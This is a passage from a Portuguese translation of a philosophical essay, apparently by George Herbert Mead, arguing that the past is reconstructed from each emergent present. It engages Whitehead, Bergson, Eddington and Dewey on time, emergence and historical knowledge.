da qual nos encontramos esteja incluída em algum mundo ou experiência que a transcenda. Meu único ponto é que tal suposição não desempenha papel algum em nossos juízos sobre a correção do passado. Podemos ter outras razões, teológicas ou metafísicas, para supor um passado real que pudesse ser dado em uma apresentação independente de qualquer presente, mas essa suposição não entra nos postulados nem na técnica de qualquer tipo de pesquisa histórica.&#xA;&#xA;Embora a concepção de um passado irrevogável “em si” seja talvez o pano de fundo comum do pensamento, é interessante retornar à afirmação que fiz anteriormente de que o cientista pesquisador aguarda não apenas com equanimidade, mas também com vivo interesse, as mudanças fundamentais que pesquisas posteriores trarão às determinações mais exatas que hoje podemos fazer. A imagem que isso oferece é a de presentes deslizando uns nos outros, cada qual com um passado que lhe é referível, cada passado incorporando em si aqueles que o precederam e, em certa medida, reconstruindo-os a partir de seu próprio ponto de vista.&#xA;&#xA;No momento em que tomamos esses presentes anteriores como existências separadas da apresentação deles como passados, eles deixam de ter significado para nós e perdem qualquer valor que possam ter para interpretar nosso próprio presente e determinar nossos futuros. Eles podem ser localizados na geometria do espaço-tempo de Minkowski, mas, mesmo sob essa suposição, só podem alcançar-nos por meio de nossos próprios referenciais ou perspectivas; e o mesmo seria verdadeiro sob as suposições de qualquer outra metafísica que localizasse a realidade do passado em passados independentes de qualquer presente.&#xA;&#xA;Provavelmente se diria que a irrevogabilidade do passado está localizada em tal ordem metafísica, e é esse o ponto que desejo discutir. O historiador não duvida de que algo aconteceu. Sua dúvida é quanto ao que aconteceu. Ele também procede com a suposição de que, se pudesse dispor de todos os fatos ou dados, poderia determinar o que foi que aconteceu. Isto é, sua ideia de irrevogabilidade liga-se, como já afirmei, ao “o quê” que aconteceu, assim como ao desaparecimento do evento.&#xA;&#xA;Mas, se há emergência, o reflexo disso no passado ocorre imediatamente. Há um novo passado, pois, a partir de cada nova ascensão, a paisagem que se estende atrás de nós torna-se uma paisagem diferente. A analogia é falha porque as alturas estão ali, e os aspectos das paisagens que elas revelam também estão ali e poderiam ser reconstruídos a partir do presente do viajante, se ele tivesse diante de si todas as implicações de seu presente; ao passo que o emergente não está ali de antemão e, por definição, não poderia ser incluído nem mesmo na apresentação mais completa do presente. A realidade metafísica sugerida pela expressão de Eddington de que nossa experiência é uma aventura da mente na geometria ordenada do espaço-tempo corresponderia, contudo, a uma paisagem preexistente.&#xA;&#xA;Há, naturalmente, a doutrina alternativa de Whitehead, segundo a qual as perspectivas existem na natureza como sistemas temporais que se intersectam, produzindo assim não apenas diferentes presentes, mas também diferentes passados que lhes correspondem. Não consigo ver, entretanto, como Whitehead, com a geometria fixa do espaço-tempo que ele aceita, pode escapar de uma ordem fixa de eventos, ainda que o “o quê” desses eventos dependa da ingressão de objetos eternos surgidos por meio da ação de Deus, dando assim origem à emergência.&#xA;&#xA;O ponto em questão é saber se a necessidade com a qual o cientista lida é uma necessidade que determina o presente a partir de um passado independente desse ou de qualquer presente. Um espaço-tempo ordenado envolve tal necessidade metafísica. Desse ponto de vista, os diferentes passados da experiência são reinterpretações subjetivas, e o físico não está interessado em torná-los parte do esquema total dos eventos. A filosofia de Whitehead é uma tentativa valente de harmonizar esse tipo de necessidade geométrica com a emergência e com as diferenças entre perspectivas variadas. Não acredito que isso possa ser realizado, mas estou mais interessado na resposta à questão de saber se a necessidade envolvida nas relações entre presente e passado deriva de tal necessidade metafísica, isto é, de uma necessidade independente de qualquer presente.&#xA;&#xA;Retorno aqui à minha proposição original de que uma realidade que transcende o presente deve manifestar-se no presente. Essa alternativa é aquela encontrada na atitude do cientista pesquisador, quer ele a reconheça em sua doutrina ou não. Ela consiste em que há e sempre haverá uma relação necessária entre o passado e o presente, mas que o presente no qual o emergente aparece aceita aquilo que é novo como parte essencial do universo e, desse ponto de vista, reescreve seu passado. O emergente então deixa de ser um emergente e passa a decorrer do passado que substituiu o passado anterior.&#xA;&#xA;Falamos da vida e da consciência como emergentes, mas nossas naturezas racionalistas jamais ficarão satisfeitas enquanto não tivermos concebido um universo no qual elas surjam inevitavelmente daquilo que as precedeu. Não conseguimos fazer do emergente uma parte da relação pensante entre passado e presente e, mesmo quando aparentemente o aceitamos, levamos a bioquímica e a psicologia behaviorista tão longe quanto podemos no esforço de reduzir a emergência a um ponto evanescente. Mas, mesmo concedendo ao cientista pesquisador uma vitória completa — um universo inteiramente racionalizado, dentro do qual haja uma ordem determinada — ele ainda aguardará o aparecimento de novos problemas que emergirão em novos presentes para serem novamente racionalizados com outro passado, o qual incorporará harmoniosamente o antigo passado em si mesmo.&#xA;&#xA;Reconhecidamente, a racionalidade completa do universo baseia-se em uma indução, e aquilo em que essa indução se fundamenta é um ponto controverso na doutrina filosófica. Admitida qualquer razão justificável para acreditar nela, todas as nossas correlações a fortalecem enormemente. Mas existe tal razão? Nesse ponto crucial há a maior incerteza. Evidentemente, o procedimento do cientista ignora isso. Para ele, não se trata de uma questão controversa. Não é, de modo algum, uma questão em seu procedimento. Ele está simplesmente ocupado em encontrar uma ordem racional e em estendê-la retrospectivamente, para que possa prever o futuro.&#xA;&#xA;É aqui que seu mundo dado funciona. Se ele consegue ajustar sua hipótese a esse mundo e se ela antecipa aquilo que ocorre, então ela se torna a descrição do que aconteceu. Se fracassa, outra hipótese a substitui e outro passado substitui aquele que a primeira hipótese implicava.&#xA;&#xA;Em suma, o passado (ou a estrutura significativa do passado) é tão hipotético quanto o futuro. O relato de Jeans sobre o que vem ocorrendo no interior de Aldebarã ou de Sírius Menor durante os últimos milhões de anos é muito mais hipotético do que o catálogo do astrônomo acerca dos eclipses que ocorrerão no próximo século e dos lugares onde serão visíveis. E a suposição metafísica de que houve um passado definido de eventos nada acrescenta nem subtrai da segurança de qualquer hipótese que ilumine nosso presente.&#xA;&#xA;Ela oferece, de fato, a forma vazia dentro da qual estendemos qualquer hipótese e desenvolvemos suas implicações, mas não possui sequer a fixidez que Kant encontrou em suas formas da intuição. Os paradoxos da relatividade, aquilo que Whitehead denomina os diferentes significados do tempo em diferentes sistemas temporais, revelam a natureza hipotética dos esquemas regulados do passado dentro dos quais devemos encaixar os eventos que nossas teorias físicas desenrolam atrás de nós.&#xA;&#xA;Podemos recorrer ao espaço-tempo absoluto com suas coincidências de eventos e os intervalos entre eles, mas mesmo aqui permanece discutível se essa interpretação das transformações de um referencial para outro é definitiva, se alcançamos a estrutura última do universo físico ou apenas um aparato matemático mais poderoso para atingir maior exatidão em medições e cálculos, cuja interpretação variará com a história da física matemática. O espaço-tempo de Minkowski é tão hipotético quanto a constituição ondulatória da matéria proposta por de Broglie.&#xA;&#xA;Mas a irrevogabilidade do evento passado permanece mesmo que estejamos incertos quanto ao que foi o evento passado. Nem mesmo o caráter reversível dos processos físicos que as equações matemáticas parecem revelar abala esse caráter da experiência temporal. Pode-se conceber que, visto de uma enorme distância, a ordem de alguns daqueles que chamamos de mesmos eventos possa diferir em diferentes perspectivas, mas, dentro de qualquer perspectiva, aquilo que passou não pode recorrer. Nessa perspectiva, o que aconteceu aconteceu, e qualquer teoria apresentada deve abrir espaço para essa ordem dentro dessa perspectiva.&#xA;&#xA;Há uma direção temporal inalterável naquilo que está ocorrendo e, se pudermos vincular outros processos a essa passagem, poderemos atribuir-lhes tanta certeza quanto o grau dessa vinculação justificar. Dado um certo valor para a velocidade de um corpo em movimento em determinado referencial, podemos determinar onde o corpo necessariamente estará. Nosso problema consiste em determinar exatamente o que precedeu aquilo que está ocorrendo, para que a direção do progresso temporal possa determinar o que o mundo virá a ser.&#xA;&#xA;Há um certo processo temporal em curso na experiência. Aquilo que ocorreu desemboca naquilo que está ocorrendo, e, nessa passagem, o que ocorreu determina espaço-temporalmente aquilo que está passando para o futuro. Assim, na medida em que possamos determinar as constantes do movimento, podemos seguir essa determinação, e nossa análise procura resolver o acontecimento, tanto quanto possível, em movimento. Em geral, uma vez que a própria passagem é dada na experiência, a direção das mudanças em curso condiciona parcialmente aquilo que ocorrerá.&#xA;&#xA;O evento que ocorreu e a direção do processo em andamento formam a base para a determinação racional do futuro. O passado irrevogável e a mudança em curso são os dois fatores aos quais vinculamos todas as nossas especulações a respeito do futuro. A probabilidade encontra-se no caráter do processo que está ocorrendo na experiência. Contudo, por mais avidamente que busquemos estruturas espaço-temporais que tragam consigo resultados dedutíveis, ainda assim reconhecemos relações entre as coisas em seus processos que não podem ser resolvidas em elementos quantitativos; e, embora tanto quanto possível as correlacionemos com caracteres mensuráveis, reconhecemo-las, em todo caso, como condições determinantes daquilo que está ocorrendo.&#xA;&#xA;Buscamos seus antecedentes no passado e julgamos o futuro pela relação desse passado com aquilo que está ocorrendo. Todas essas relações dentro do processo em curso são relações determinantes daquilo que será, embora a forma específica dessa determinação constitua o problema científico de qualquer situação particular. A efetividade da determinação dentro da passagem da experiência direta é aquilo que Hume, por meio de suas pressuposições e de seu tipo de análise, eliminou da experiência, e é também aquilo que confere à dedução kantiana das categorias a validade que ela possui.&#xA;&#xA;É tarefa da filosofia contemporânea colocar em congruência, de um lado, essa universalidade da determinação, que constitui o texto da ciência moderna, e, de outro, a emergência do novo, que pertence não apenas à experiência dos organismos sociais humanos, mas também é encontrada em uma natureza que a ciência e a filosofia que a seguiu separaram da natureza humana. A dificuldade que imediatamente se apresenta é que o emergente mal apareceu e já começamos a racionalizá-lo; isto é, procuramos mostrar que ele, ou ao menos as condições que determinam sua aparição, podem ser encontradas no passado que estava por trás dele.&#xA;&#xA;Assim, os passados anteriores dos quais ele emergiu como algo que não o envolvia são incorporados em um passado mais abrangente que efetivamente conduz até ele. Ora, o que isso significa é que tudo o que acontece, inclusive o emergente, acontece sob condições determinantes — especialmente, do ponto de vista das ciências exatas, sob condições espaço-temporais que conduzem a conclusões dedutíveis acerca do que ocorrerá dentro de certos limites, mas também sob condições determinantes de natureza qualitativa, cujas garantias residem apenas na probabilidade —, embora essas condições jamais determinem completamente o “o que é” daquilo que ocorrerá.&#xA;&#xA;A água, distinta das combinações de oxigênio e hidrogênio, pode surgir. A vida e a chamada consciência podem surgir. E os quanta podem surgir, embora se possa argumentar que tal surgimento se encontra em um “nível” diferente daquele da vida e da consciência. Quando esses emergentes apareceram, tornaram-se parte das condições determinantes que ocorrem em presentes reais, e estamos particularmente interessados em apresentar o passado que, na situação diante de nós, condicionou o aparecimento do emergente, especialmente de tal maneira que possamos conduzir a novas aparições desse objeto.&#xA;&#xA;Orientamo-nos não com referência ao passado que foi um presente dentro do qual o emergente apareceu, mas em direção a uma reformulação do passado enquanto condicionante do futuro, para que possamos controlar seu reaparecimento. Quando a vida apareceu, pudemos reproduzir vida; e, dada a consciência, podemos controlar sua aparição e suas manifestações. Mesmo a descrição do passado dentro do qual o emergente apareceu é inevitavelmente feita do ponto de vista de um mundo dentro do qual o próprio emergente é tanto um fator condicionante quanto condicionado.&#xA;&#xA;Não poderíamos trazer de volta esses presentes passados simplesmente tal como ocorreram — se é que estamos justificados em usar essa expressão — exceto como presentes. Uma apresentação exaustiva deles equivaleria apenas a revivê-los. Isto é, um presente deslizando para outro não conota aquilo que se entende por passado. Mas mesmo essa afirmação implica que houve tais presentes deslizando uns nos outros e, quer os consideremos desse ponto de vista ou não, parecemos implicar sua realidade enquanto tais, como a estrutura dentro da qual deve situar-se o tipo de passado que nos interessa, se ele é um aspecto do passado real.&#xA;&#xA;Deixando de lado as ambiguidades que tal afirmação contém, o que quero enfatizar é que a irrevogabilidade do passado não deriva dessa concepção do passado. Pois, em nosso uso do termo irrevogabilidade, estamos apontando para aquilo que deve ter sido, e é uma estrutura e um processo no presente que constituem a fonte dessa necessidade. Certamente não podemos retornar a tal passado e testar nossas conjecturas por meio da inspeção efetiva de seus eventos em seu acontecer. Testamos nossas conjecturas acerca do passado pelas direções condicionantes do presente e pelos acontecimentos posteriores no futuro, os quais devem ser de certo tipo se o passado que concebemos realmente existiu.&#xA;&#xA;A força da irrevogabilidade encontra-se, então, na extensão da necessidade com que aquilo que acaba de acontecer condiciona aquilo que está emergindo no futuro. O que ultrapassa isso pertence a um quadro metafísico que não tem interesse nos passados que surgem atrás de nós.&#xA;&#xA;Na análise que empreendi, chegamos então, primeiro, à passagem dentro da qual aquilo que está ocorrendo condiciona aquilo que está surgindo. Tudo o que ocorre acontece sob condições necessárias. Em segundo lugar, essas condições, embora necessárias, não determinam em sua plena realidade aquilo que emerge. Estamos obtendo interessantes reflexos dessa situação a partir da crítica que o cientista faz de seus próprios métodos de alcançar a determinação exata da posição e da velocidade e das implicações dos quanta.&#xA;&#xA;O que aparece nessa crítica é que, embora o cientista jamais abandone o condicionamento daquilo que ocorre por aquilo que aconteceu anteriormente, expresso em termos de probabilidade, ele se vê perfeitamente capaz de pensar como emergentes até mesmo aqueles eventos que estão sujeitos à determinação mais exata. Não estou tentando prever qual interpretação futura será dada às especulações de de Broglie, Schröder e Planck. Estou apenas indicando que, mesmo no campo da física matemática, o pensamento rigoroso não implica necessariamente que o condicionamento do presente pelo passado traga consigo a determinação completa do presente pelo passado.&#xA;&#xA;Terceiro, na passagem, o condicionamento daquilo que está ocorrendo por aquilo que ocorreu, do presente pelo passado, está presente. O passado, nesse sentido, está no presente; e, naquilo que chamamos de experiência consciente, sua presença manifesta-se na memória e no aparato histórico que amplia a memória, como aquela parte da natureza condicionante da passagem que se reflete na experiência do indivíduo orgânico.&#xA;&#xA;Se todos os objetos em um presente são condicionados pelos mesmos caracteres na passagem, seus passados são implicitamente os mesmos; mas se, para seguir uma sugestão tomada das especulações acerca dos quanta, um elétron dentre dois mil libera energia quando não há condições determinantes para a seleção desse elétron em vez dos outros mil novecentos e noventa e nove, é evidente que o passado tal como se manifesta na conduta desse elétron será de um tipo que nem sequer implicitamente será o mesmo que o dos outros naquele grupo, embora seu salto seja condicionado por tudo o que ocorreu antes.&#xA;&#xA;Se, entre dois mil indivíduos sob condições sociais desagregadoras, um comete suicídio quando, tanto quanto se pode ver, um era tão propenso quanto outro a sucumbir, seu passado possui uma natureza particularmente pungente que está ausente do passado dos demais, embora seu suicídio seja uma expressão do passado. O passado está ali condicionando o presente e sua passagem para o futuro, mas, na organização de tendências incorporadas em um indivíduo, pode haver um emergente que confere a essas tendências uma estrutura que pertence apenas à situação desse indivíduo.&#xA;&#xA;As tendências provenientes da passagem passada e do condicionamento inerente à passagem tornam-se influências diferentes quando assumem essa estrutura organizada de tendências. Isso seria tão verdadeiro para o equilíbrio entre processos de desagregação e aglomeração em uma estrela quanto para o ajustamento recíproco entre uma forma viva e seu ambiente. A relação estrutural em seu equilíbrio ou ajustamento recíproco organiza aqueles processos em passagem que se refletem retrospectivamente e nos conduzem a uma descrição da história da estrela.&#xA;&#xA;Como Dewey sustentou, os eventos aparecem como histórias que possuem um desfecho, e, quando um processo histórico está ocorrendo, a organização das fases condicionantes do processo é o elemento novo que não é previsível a partir das fases separadas em si mesmas, e que imediatamente estabelece o cenário para um passado que conduz a esse resultado. A organização de qualquer coisa individual traz consigo a relação dessa coisa com processos que ocorreram antes que essa organização se estabelecesse. Nesse sentido, o passado dessa coisa é “dado” no presente em passagem da própria coisa, e nossas histórias das coisas são elaborações daquilo que está implícito nessa situação. Esse “dado” na passagem está ali e constitui o ponto de partida para uma estrutura cognitiva de um passado.&#xA;&#xA;Quarto, esse caráter emergente, sendo responsável por uma relação entre processos em passagem, estabelece um passado dado que é, por assim dizer, uma perspectiva do objeto dentro da qual esse caráter aparece. Podemos conceber um objeto como, digamos, algum átomo de hidrogênio que permaneceu o que é através de períodos incomensuráveis em completo ajustamento ao seu entorno, que permaneceu real no deslizar de um presente para outro, ou melhor, em uma passagem contínua, ininterrupta e sem acontecimentos. Para tal objeto haveria existência ininterrupta, mas não passado, a menos que retornássemos à ocasião em que emergiu como átomo de hidrogênio.&#xA;&#xA;Isso equivale a dizer que, onde o ser é existência mas não devir, não há passado, e que a determinação envolvida na passagem é uma condição do passado, mas não sua realização. A relação de passagem envolve naturezas distinguíveis nos eventos antes que passado, presente e futuro possam surgir, assim como a extensão é uma relação que envolve coisas físicas distinguíveis antes que um espaço estruturável possa surgir. O que torna um evento distinguível de outro é um devir que afeta a natureza interna do evento.&#xA;&#xA;Parece-me que a extrema matematização da ciência recente, na qual a realidade do movimento é reduzida a equações em que a mudança desaparece numa identidade, e na qual espaço e tempo desaparecem em um contínuo quadridimensional de eventos indistinguíveis que não é nem espaço nem tempo, é um reflexo do tratamento do tempo como passagem sem devir.&#xA;&#xA;O que é então um presente? A definição de Whitehead nos remeteria à extensão temporal da passagem dos eventos que compõem uma coisa, uma extensão suficientemente ampla para tornar possível que a coisa seja aquilo que é. A de um átomo de ferro não precisaria ser mais longa do que o período dentro do qual a revolução de cada um de seus elétrons em torno do núcleo se completa. O universo durante esse período constituiria uma duração do ponto de vista do átomo. O presente especioso de um indivíduo humano seria presumivelmente um período dentro do qual ele pudesse ser ele mesmo.&#xA;&#xA;Do ponto de vista que sugeri, ele envolveria um devir. Deve haver ao menos algo que aconteça à coisa e nela, algo que afete sua natureza, para que um momento possa ser distinguido de outro, para que possa haver tempo. Mas há, em tal afirmação, um conflito entre princípios de definição. De um ponto de vista, estamos buscando aquilo que é essencial a um presente; de outro, estamos buscando o limite inferior em um processo de divisão.&#xA;&#xA;Referir-me-ei primeiro a este último, pois ele envolve a questão da relação do tempo com a passagem — com aquilo dentro do qual o tempo parece situar-se e em termos de cuja extensão colocamos o tempo e comparamos tempos. A milésima parte de um segundo possui um significado real, e podemos conceber o universo afundando em um mar de entropia dentro do qual todo devir tenha cessado.&#xA;&#xA;Estamos lidando aqui com uma abstração da extensão da mera passagem em relação ao tempo dentro do qual os eventos acontecem porque se tornam. No tratamento de Whitehead, isso é chamado de “abstração extensiva” e conduz a uma partícula-evento assim como a análise matemática conduz ao diferencial. E uma partícula-evento deveria ter a mesma relação com algo que se torna que o diferencial de uma mudança, tal como uma velocidade acelerada, tem com o processo inteiro.&#xA;&#xA;Nessa medida, a abstração extensiva é um método de análise e integração e não requer outra justificação além de seu sucesso. Mas Whitehead a utiliza como método de abstração metafísica e encontra, no mero acontecer, o evento, a substância daquilo que se torna. Ele transfere o conteúdo daquilo que se torna para um mundo de “objetos eternos” que ingressam nos eventos sob o controle de um princípio situado fora de sua ocorrência.&#xA;&#xA;Assim, embora a existência daquilo que ocorre seja encontrada no presente, o “o que é” daquilo que ocorre não surge do acontecer; ele acontece ao evento por meio do processo metafísico da ingressão. Isso me parece um uso impróprio da abstração, pois conduz a uma separação metafísica daquilo que foi abstraído em relação à realidade concreta da qual a abstração foi feita, em vez de deixá-lo como um instrumento no controle intelectual dessa realidade.&#xA;&#xA;Bergson refere-se, penso eu, ao mesmo uso impróprio da abstração, em outro contexto, como a espacialização do tempo, contrastando a natureza exclusiva de tais momentos temporais com a interpenetração dos conteúdos da “duração” real.&#xA;&#xA;Se, ao contrário, reconhecermos aquilo que se torna como o evento que, em sua relação com outros eventos, dá estrutura ao tempo, então a abstração da passagem em relação àquilo que está ocorrendo é puramente metodológica. Levamos nossa análise tão longe quanto o controle do objeto exige, mas sempre reconhecendo que aquilo que é abstraído possui sua realidade na integração daquilo que está ocorrendo.&#xA;&#xA;Que esse é o resultado de definir o evento como aquilo que se torna é evidente, penso eu, na aplicação e no teste de nossas hipóteses mais abstrusas. Para terem valor e serem acreditadas, elas devem apresentar novos eventos surgindo de antigos, como a expansão ou contração do universo nas especulações de Einstein e Weyl acerca das aparentes recessões em velocidades enormes de nebulosas distantes, ou o arrancamento de elétrons dos núcleos atômicos no centro dos corpos estelares nas especulações de Jeans sobre a transformação da matéria em radiação.&#xA;&#xA;E esses acontecimentos devem ajustar-se de tal modo às nossas descobertas experimentais que possam encontrar sua realidade na concreção daquilo que está ocorrendo em um presente efetivo. Os passados que eles estendem atrás de nós são tão hipotéticos quanto o futuro que nos ajudam a prever. Tornam-se válidos na interpretação da natureza na medida em que apresentam uma história de devires na natureza conduzindo àquilo que está se tornando hoje, na medida em que revelam aquilo que se ajusta ao padrão que emerge do estrondoso tear do tempo, e não na medida em que erigem entidades metafísicas que são o tênue reverso de um aparato matemático.&#xA;&#xA;Se, na expressão de Bergson, a “duração real” torna-se tempo por meio do aparecimento de eventos únicos, distinguíveis entre si por sua natureza qualitativa — algo que é emergente em cada evento —, então a mera passagem é um modo de ordenar esses eventos. Mas o que é essencial a essa ordenação é que, em cada intervalo isolado, deve ser possível que algo se torne, que algo único surja. Estamos sujeitos a uma ilusão psicológica se supomos que o ritmo da contagem e a ordem que surge da contagem correspondem a uma estrutura da própria passagem, separada dos processos que entram em ordem por meio da emergência dos eventos.&#xA;&#xA;Jamais alcançamos o próprio intervalo entre eventos, exceto em correlações entre eles e outras situações dentro das quais encontramos congruência e substituição, algo que nunca pode ocorrer na passagem enquanto tal. Alcançamos aquilo que pode ser chamado de igualdade funcional de intervalos representados dentro de processos que envolvem equilíbrio e ritmo, mas, com base nisso, estabelecer o tempo como uma quantidade dotada de uma natureza essencial que permite sua divisão em porções iguais de si mesmo constitui um uso injustificado da abstração.&#xA;&#xA;Podemos reconstruir hipoteticamente os processos passados implicados naquilo que está ocorrendo como base para a construção cognitiva do futuro que está surgindo. Aquilo de que os dados experimentais nos asseguram é que compreendemos suficientemente o que está ocorrendo para prever o que terá lugar, não que tenhamos alcançado uma imagem correta do passado independente de qualquer presente, pois esperamos que essa imagem se altere à medida que novos eventos emergem.&#xA;&#xA;Nessa atitude, estamos relacionando em nossa antecipação presentes que deslizam uns nos outros, e seus passados pertencem a eles. Eles precisam ser reconstruídos à medida que são incorporados em um novo presente e, como tais, pertencem a esse presente, e não mais ao presente do qual passamos para o presente atual.&#xA;&#xA;Um presente, então, em contraste com a abstração da mera passagem, não é um pedaço recortado arbitrariamente da dimensão temporal de uma realidade uniformemente fluente. Sua principal referência é ao evento emergente, isto é, à ocorrência de algo que é mais do que os processos que conduziram até ele e que, por sua mudança, continuidade ou desaparecimento, acrescenta às passagens posteriores um conteúdo que elas de outro modo não possuiriam. A marca da passagem sem eventos emergentes é sua formulação em equações nas quais os chamados instantes desaparecem numa identidade, como apontou Meyerson.&#xA;&#xA;Dado um evento emergente, suas relações com processos antecedentes tornam-se condições ou causas. Tal situação é um presente. Ela delimita e, em certo sentido, seleciona aquilo que tornou possível sua peculiaridade. Cria, com sua singularidade, um passado e um futuro. Tão logo a consideramos, ela se torna uma história e uma profecia. Seu próprio diâmetro temporal varia conforme a extensão do evento.&#xA;&#xA;Pode haver uma história do universo físico como aparecimento de uma galáxia de galáxias. Há uma história de todo objeto que é único. Mas não haveria tal história do universo físico até que a galáxia aparecesse, e ela continuaria apenas enquanto a galáxia se mantivesse contra forças disruptivas e coesivas. Se perguntarmos qual pode ser a extensão temporal da singularidade responsável por um presente, a resposta deve ser, nos termos de Whitehead, que ela é um período suficientemente longo para permitir que o objeto seja aquilo que é.&#xA;&#xA;Mas a questão é ambígua, pois o termo “extensão temporal” implica uma medida do tempo. O passado, tal como aparece com o presente e o futuro, é a relação do evento emergente com a situação da qual surgiu, e é o evento que define essa situação. A continuidade ou desaparecimento daquilo que surge é o presente passando para o futuro. Passado, presente e futuro pertencem a uma passagem que adquire estrutura temporal por meio do evento, e podem ser considerados longos ou curtos conforme sejam comparados com outras passagens desse tipo.&#xA;&#xA;Mas, enquanto existentes na natureza — na medida em que tal afirmação tenha significado —, o passado e o futuro são os limites daquilo que denominamos presente e são determinados pelas relações condicionantes do evento com sua situação.&#xA;&#xA;Os passados e futuros aos quais nos referimos estendem-se para além dessas relações contíguas na passagem. Nós os prolongamos na memória e na história, na antecipação e na previsão. Eles são eminentemente o campo da ideação e encontram seu locus naquilo que se chama mente. Embora estejam no presente, referem-se àquilo que não está nesse presente, como é indicado por sua relação com passado e futuro. Referem-se para além de si mesmos, e dessa referência surge sua natureza representacional.&#xA;&#xA;Eles pertencem evidentemente a organismos, isto é, a eventos emergentes cuja natureza envolve a tendência de manter-se. Em outras palavras, sua situação envolve ajustamento voltado para um passado e sensibilidade seletiva voltada para um futuro. Aquilo que pode ser chamado de matéria da qual surgem as ideias são as atitudes desses organismos: hábitos, quando olhamos para o passado, e ajustamentos iniciais dentro do ato às consequências de suas respostas, quando olhamos para o futuro. Até aqui, esses elementos pertencem ao que pode ser chamado de passado e futuro imediatos.&#xA;&#xA;Essa relação do evento com sua situação, do organismo com seu ambiente, juntamente com sua dependência mútua, conduz-nos à relatividade e às perspectivas nas quais ela aparece na experiência. A natureza do ambiente corresponde aos hábitos e atitudes seletivas dos organismos, e as qualidades pertencentes aos objetos do ambiente só podem ser expressas em termos das sensibilidades desses organismos. O mesmo é verdadeiro para as ideias.&#xA;&#xA;O organismo, por meio de seus hábitos e atitudes antecipatórias, encontra-se relacionado àquilo que se estende para além de seu presente imediato. Aqueles caracteres das coisas que, na atividade do organismo, se referem ao que está além do presente assumem o valor daquilo a que se referem. O campo da mente, então, é o ambiente mais amplo requerido pela atividade do organismo, mas que transcende o presente.&#xA;&#xA;O que está presente no organismo, contudo, é sua própria atividade nascente, e aquilo nele mesmo e no ambiente que a sustenta; e está presente também seu movimento vindo do passado e indo além do presente. Pertence ao chamado organismo consciente completar esse ambiente temporal mais amplo pelo uso de caracteres encontrados no presente. O mecanismo pelo qual a mente social realiza isso discutirei mais tarde; o que desejo destacar agora é que o campo da mente é a extensão temporal do ambiente do organismo, e que uma ideia reside no organismo porque o organismo utiliza aquilo em si mesmo que se move para além de seu presente para ocupar o lugar daquilo em direção ao qual sua própria atividade tende.&#xA;&#xA;Aquilo no organismo que fornece a ocasião para a mente é a atividade que alcança para além do presente dentro do qual o organismo existe.&#xA;&#xA;Mas, em uma descrição como esta, estive implicitamente estabelecendo esse período mais amplo dentro do qual, digamos, um organismo inicia e completa sua história como estando ali aparentemente em independência de qualquer presente; e meu propósito é insistir na proposição oposta, a saber, que esses períodos mais amplos não podem ter realidade exceto na medida em que existam em presentes, e que todas as suas implicações e valores estão aí localizados.&#xA;&#xA;Isso nos remete, primeiro, ao fato evidente de que todo o aparato do passado — imagens da memória, monumentos históricos, restos fósseis e semelhantes — está em algum presente; e, segundo, àquela porção do passado que está ali na passagem da experiência, conforme determinada pelo evento emergente. Remete-nos, terceiro, ao teste necessário da formulação do passado nos eventos que surgem na experiência. O passado de que falamos situa-se, com todos os seus caracteres, dentro desse presente.&#xA;&#xA;Há, entretanto, a implicação assumida de que esse presente se refere a entidades que possuem uma realidade independente deste e de qualquer outro presente, cujos detalhes completos, embora evidentemente além de qualquer recuperação, são inevitavelmente pressupostos. Ora, há uma confusão entre tal suposição metafísica e o fato evidente de que somos incapazes de revelar tudo o que está implicado em qualquer presente.&#xA;&#xA;Aqui estamos com Newton diante de um mar sem limites, recolhendo apenas os seixos de sua praia. Não há nada de transcendente nessa impotência de nossas mentes para esgotar qualquer situação. Todo avanço rumo a um conhecimento maior simplesmente amplia o horizonte da experiência, mas tudo permanece dentro da experiência concebível.&#xA;&#xA;Uma mente maior do que a de Newton ou Einstein revelaria na experiência, no mundo que está aí, estruturas e processos que não conseguimos encontrar nem sequer esboçar. Ou tomemos a concepção de Bergson segundo a qual todas as nossas memórias, ou todas as ocorrências sob a forma de imagens, acorrem sobre nós e são contidas por um sistema nervoso central. Tudo isso é concebível em um presente cuja riqueza integral estivesse à disposição desse próprio presente.&#xA;&#xA;Isso não significa que os éons revelados nessas estruturas e processos, ou as histórias que essas imagens conotam, desenrolar-se-iam em um presente temporalmente tão extenso quanto sua formulação implica. Significa, na medida em que tal concepção ou imaginação desenfreada possa ter sentido, que teríamos uma riqueza inconcebível oferecida à nossa análise na abordagem de qualquer problema surgido na experiência.&#xA;&#xA;O passado na passagem é irrecuperável assim como irrevogável. Ele está produzindo toda a realidade que existe. O significado daquilo que é é iluminado e ampliado diante do emergente na experiência, como (a+b) elevado à vigésima quinta potência pelo teorema binomial, pela expansão da passagem que está ocorrendo. &#xA;&#xA;Dizer que a Declaração de Independência foi assinada em 4 de julho de 1776 significa que, no sistema temporal que carregamos conosco e com a formulação de nossos hábitos políticos, essa data reaparece em nossas celebrações. Sendo aquilo que somos no mundo social e físico que habitamos, damos conta do que ocorre nesse cronograma temporal, mas, como tabelas de horários ferroviários, ele está sempre sujeito a mudanças sem aviso prévio. Cristo nasceu quatro anos antes de d.C.&#xA;&#xA;Nossa referência é sempre à estrutura do presente, e nosso teste da formulação que fazemos é sempre o de realizar com sucesso nossos cálculos e observações em um futuro em ascensão. Se dizemos que algo aconteceu em tal data, quer possamos especificá-la ou não, devemos querer dizer que, se em imaginação nos colocássemos de volta na data suposta, teríamos tido tal experiência; mas não é disso que nos ocupamos quando elaboramos a história do passado. O que requer iluminação e direção é o significado daquilo que está ocorrendo na ação ou na apreciação, devido ao aparecimento constante do novo, de cujo ponto de vista nossa experiência exige uma reconstrução que inclua o passado.&#xA;&#xA;A melhor abordagem desse significado encontra-se no mundo dentro do qual nossos problemas surgem. Suas coisas são coisas duradouras que são aquilo que são devido ao caráter condicionante da passagem. Seu passado está naquilo que elas são. Tal passado não é eventual. Quando elaboramos a história de uma árvore cuja madeira se encontra nas cadeiras em que nos sentamos, desde a diatomácea até o carvalho recentemente abatido, essa história gira em torno da constante reinterpretação de fatos que surgem continuamente; nem esses fatos novos devem ser encontrados simplesmente no impacto de experiências humanas mutáveis sobre um mundo que está aí.&#xA;&#xA;Pois, em primeiro lugar, as experiências humanas fazem tanto parte desse mundo quanto quaisquer de suas outras características, e o mundo é um mundo diferente por causa dessas experiências. E, em segundo lugar, em qualquer história que construamos somos forçados a reconhecer a mudança na relação entre a passagem condicionante e o evento emergente, naquela parte do passado que pertence à passagem, mesmo quando essa passagem não é expandida na ideação.&#xA;&#xA;O resultado do que disse é que a avaliação e o significado de todas as histórias residem na interpretação e no controle do presente; que, enquanto estruturas ideacionais, elas surgem sempre da mudança, que é parte tão essencial da realidade quanto o permanente, e dos problemas que a mudança acarreta; 